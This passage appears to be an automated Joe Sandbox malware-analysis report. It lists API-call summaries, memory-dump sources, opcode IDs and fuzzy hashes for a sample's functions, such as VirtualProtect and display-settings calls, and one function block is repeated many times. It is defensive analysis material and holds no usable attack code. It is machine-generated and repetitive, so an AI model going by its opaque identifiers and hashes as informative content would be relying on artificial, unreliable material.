                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: State$Message$PeekTimeVirtual
                                                                            • String ID: ,
                                                                            • API String ID: 1171625170-3772416878
                                                                            • Opcode ID: 4ee1db7b8f5ffe9687f9134610cfb6f340ffa0424a311f8317f69ea6582160f0
                                                                            • Instruction ID: 6c46310d30a11a7dc731c5c7cee37011acf60de45a34a29a6c8da7496cf55ec6
                                                                            • Opcode Fuzzy Hash: 4ee1db7b8f5ffe9687f9134610cfb6f340ffa0424a311f8317f69ea6582160f0
                                                                            • Instruction Fuzzy Hash: 1451AEB0908709DFDB09DFA9C58469EBBF0BB85715F10CA2EE8989B251D7749884CF42
                                                                            APIs
                                                                            • SetThreadExecutionState.KERNEL32(00000000), ref: 6460B0C0
                                                                              • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460870F
                                                                              • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460872B
                                                                              • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 64608747
                                                                              • Part of subcall function 646086AB: RtlVerifyVersionInfo.NTDLL ref: 64608765
                                                                            • SystemParametersInfoW.USER32 ref: 6460B10C
                                                                            • SystemParametersInfoW.USER32 ref: 6460B130
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: ConditionInfoMask$ParametersSystem$ExecutionStateThreadVerifyVersion
                                                                            • String ID: Hcd
                                                                            • API String ID: 2138337975-1373192235
                                                                            • Opcode ID: 979452bf78e6a26bae13934c425d8f3d7aacf65e4f70a9a2e2ee3aaa43562847
                                                                            • Instruction ID: d552217315db711c433609a4cec4eadd01faa30551330ef515e34a60748e55aa
                                                                            • Opcode Fuzzy Hash: 979452bf78e6a26bae13934c425d8f3d7aacf65e4f70a9a2e2ee3aaa43562847
                                                                            • Instruction Fuzzy Hash: 101115B04093449FEB00AF65CA8835ABBF4FF44B19F41D89DE8D84B245D7B98484CF92
                                                                            APIs
                                                                              • Part of subcall function 646107E0: VirtualQuery.KERNEL32 ref: 64610867
                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,646012A5), ref: 64610AE7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$ProtectQuery
                                                                            • String ID: ,cd$,cd$,cd
                                                                            • API String ID: 1027372294-2852098346
                                                                            • Opcode ID: 27a0cc24ec2899f064101a97017778c95a2771941521fb0748c90b8f7c6fa918
                                                                            • Instruction ID: f638c8752a7dbe41f4048da6431f0888c62e674f3ed1fb414c928f257171a9b6
                                                                            • Opcode Fuzzy Hash: 27a0cc24ec2899f064101a97017778c95a2771941521fb0748c90b8f7c6fa918
                                                                            • Instruction Fuzzy Hash: ED114876908356CFCF10CF19D88068AB3F2FF8A718F25991AD9896B211D330B956CF81
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: DisplaySettings$ChangeEnumcallocrealloc
                                                                            • String ID:
                                                                            • API String ID: 3544475687-0
                                                                            • Opcode ID: a41ff70199d10c02772b2ed234642cbb0a79003aa1bc3d49f4ffc233d63aba94
                                                                            • Instruction ID: c93ec9d385b3a10b2921e0670dd044a3fb0b81f4653e2be81fd693868db3d0a6
                                                                            • Opcode Fuzzy Hash: a41ff70199d10c02772b2ed234642cbb0a79003aa1bc3d49f4ffc233d63aba94
                                                                            • Instruction Fuzzy Hash: E1510570904219DFDB25DF28CA847DEBBF4FF59740F0085AAE88897240E7749A85CF82
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: DataInput$callocfree
                                                                            • String ID:
                                                                            • API String ID: 253271340-0
                                                                            • Opcode ID: 954507c9f8f9c0fa5b5b9a29e5123a72444107c4e07457c857fea385b82c8961
                                                                            • Instruction ID: 1ed7145e197558902ff6e0cccc15012f54cdcde242d917b0b66c177f5ba52cfe
                                                                            • Opcode Fuzzy Hash: 954507c9f8f9c0fa5b5b9a29e5123a72444107c4e07457c857fea385b82c8961
                                                                            • Instruction Fuzzy Hash: 1041F3B4908385CFDB11EF69C18428EBBF0FF49310F01892AE8989B245D7B19895CF82
                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32 ref: 64608499
                                                                            • calloc.MSVCRT ref: 646084C5
                                                                            • WideCharToMultiByte.KERNEL32 ref: 64608502
                                                                            • free.MSVCRT ref: 64608522
                                                                              • Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
                                                                              • Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
                                                                              • Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$ErrorFormatLastMessagecallocfree
                                                                            • String ID:
                                                                            • API String ID: 1537213191-0
                                                                            • Opcode ID: 3d0c78a17ad77bacfd292b0c00cf2782b6b12de301c58f07c63f4f81ae6a1bd5
                                                                            • Instruction ID: ef536ac8975c90811966666c3dcde00199d1f5530d8d2836d31ad81eeeae261d
                                                                            • Opcode Fuzzy Hash: 3d0c78a17ad77bacfd292b0c00cf2782b6b12de301c58f07c63f4f81ae6a1bd5
                                                                            • Instruction Fuzzy Hash: F321D6B05093019FE350EF69D54434EBFE4EF85764F008A2EE4D88B290D7B9C9898B93
                                                                            APIs
                                                                            • VerSetConditionMask.KERNEL32 ref: 646087DA
                                                                            • VerSetConditionMask.KERNEL32 ref: 646087F6
                                                                            • VerSetConditionMask.KERNEL32 ref: 64608812
                                                                            • RtlVerifyVersionInfo.NTDLL ref: 64608830
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: ConditionMask$InfoVerifyVersion
                                                                            • String ID:
                                                                            • API String ID: 2793162063-0
                                                                            • Opcode ID: b15dccf56477bde5318b4f68f24da93d82684037e847ed2ac8d9eb5989c5f478
                                                                            • Instruction ID: 4a59f3fe28d3ad8b5ea2a09b7c1bad3ccb1520fbea3e1431eb5efdb67375cc92
                                                                            • Opcode Fuzzy Hash: b15dccf56477bde5318b4f68f24da93d82684037e847ed2ac8d9eb5989c5f478
                                                                            • Instruction Fuzzy Hash: 1A11DAB08083049FEB11AF29C5493AABFF4EB84354F00C85DE5D887281E7B99598CF82
                                                                            APIs
                                                                            • strcpy.MSVCRT ref: 64602FFC
                                                                            • strcpy.MSVCRT ref: 64603079
                                                                              • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                            • calloc.MSVCRT ref: 64603030
                                                                              • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                              • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                              • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                            • String ID: @Jcd
                                                                            • API String ID: 53972724-3276935698
                                                                            • Opcode ID: ec2cc9c99320ea792083c759f0b5b32b1460c23741c03a6f318325e4b3715790
                                                                            • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                            • Opcode Fuzzy Hash: ec2cc9c99320ea792083c759f0b5b32b1460c23741c03a6f318325e4b3715790
                                                                            • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                            APIs
                                                                            • strcpy.MSVCRT ref: 64602FFC
                                                                            • strcpy.MSVCRT ref: 64603079
                                                                              • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                            • calloc.MSVCRT ref: 64603030
                                                                              • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                              • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                              • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                            • String ID: @Jcd
                                                                            • API String ID: 53972724-3276935698
                                                                            • Opcode ID: e3dab228de318dfc6ea312c43b609d844db44e877f9dd8aa1410c2acb6c954e4
                                                                            • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                            • Opcode Fuzzy Hash: e3dab228de318dfc6ea312c43b609d844db44e877f9dd8aa1410c2acb6c954e4
                                                                            • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                            APIs
                                                                            • strcpy.MSVCRT ref: 64602FFC
                                                                            • strcpy.MSVCRT ref: 64603079
                                                                              • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                            • calloc.MSVCRT ref: 64603030
                                                                              • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                              • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                              • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                            • String ID: @Jcd
                                                                            • API String ID: 53972724-3276935698
                                                                            • Opcode ID: 3044d3b78d5a737cd0ba3ce62582d579fbd8dc1c671cf09e7d97e15f0688a9cf
                                                                            • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                            • Opcode Fuzzy Hash: 3044d3b78d5a737cd0ba3ce62582d579fbd8dc1c671cf09e7d97e15f0688a9cf
                                                                            • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                            APIs
                                                                            • strcpy.MSVCRT ref: 64602FFC
                                                                            • strcpy.MSVCRT ref: 64603079
                                                                              • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                            • calloc.MSVCRT ref: 64603030
                                                                              • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                              • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                              • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                            • String ID: @Jcd
                                                                            • API String ID: 53972724-3276935698
                                                                            • Opcode ID: b024e20fd1ac5cf0abd56b393151b0c3e416e959e0e1641dc301de79ef919e2e
                                                                            • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                            • Opcode Fuzzy Hash: b024e20fd1ac5cf0abd56b393151b0c3e416e959e0e1641dc301de79ef919e2e
                                                                            • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                            APIs
                                                                            • strcpy.MSVCRT ref: 64602FFC
                                                                            • strcpy.MSVCRT ref: 64603079
                                                                              • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                            • calloc.MSVCRT ref: 64603030
                                                                              • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                              • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                              • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                            • String ID: @Jcd
                                                                            • API String ID: 53972724-3276935698
                                                                            • Opcode ID: 904ceed22d49ab97418f70abad013f8d0f19ab29fab4b1345db1653271da0f0c
                                                                            • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                            • Opcode Fuzzy Hash: 904ceed22d49ab97418f70abad013f8d0f19ab29fab4b1345db1653271da0f0c
                                                                            • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                            APIs
                                                                            • strcpy.MSVCRT ref: 64602FFC
                                                                            • strcpy.MSVCRT ref: 64603079
                                                                              • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                            • calloc.MSVCRT ref: 64603030
                                                                              • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                              • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                              • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                            • String ID: @Jcd
                                                                            • API String ID: 53972724-3276935698
                                                                            • Opcode ID: d4ce6788a16016415d95563c1a5f72ef11e1afc421299125907f954b73946493
                                                                            • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                            • Opcode Fuzzy Hash: d4ce6788a16016415d95563c1a5f72ef11e1afc421299125907f954b73946493
                                                                            • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                            APIs
                                                                            • strcpy.MSVCRT ref: 64602FFC
                                                                            • strcpy.MSVCRT ref: 64603079
                                                                              • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                            • calloc.MSVCRT ref: 64603030
                                                                              • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                              • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                              • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
